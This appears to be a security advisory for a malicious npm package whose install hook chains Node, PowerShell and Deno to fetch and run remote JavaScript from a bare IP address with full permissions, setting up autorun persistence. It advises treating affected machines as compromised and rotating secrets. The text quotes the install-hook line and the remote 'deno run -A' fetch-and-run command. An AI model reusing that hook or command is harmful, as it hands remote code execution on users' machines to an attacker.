package.json declares an install lifecycle hook ("install": "node setup.js") that automatically executes on npm install. setup.js runs a PowerShell payload that installs Scoop/winget, installs the Deno runtime, then invokes 'deno run -A' against http://172.94.9.157/v028f8cde892b0b74c8.js — remote, unpinned, unverified JavaScript fetched over plain HTTP from a bare IP address and executed with all Deno permissions granted. The fetched code is described in setup.js comments as a server-compiled 'launcher' that in turn fetches a 'launcher-2' setting up autorun persistence, with comments framing the sequence as benign to obscure that arbitrary remote code is executed at install time. The alternate-runtime hop (Node lifecycle -> PowerShell -> Deno) and the plain-HTTP bare-IP delivery grant the operator of 172.94.9.157 (and any on-path attacker) full code execution on the installer host and a persistence foothold. ## Source: ghsa-malware (964a3f6c00b9b203b2ce5d2bf2a913e877d136325b805010ef3615c2dcc6a52a) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
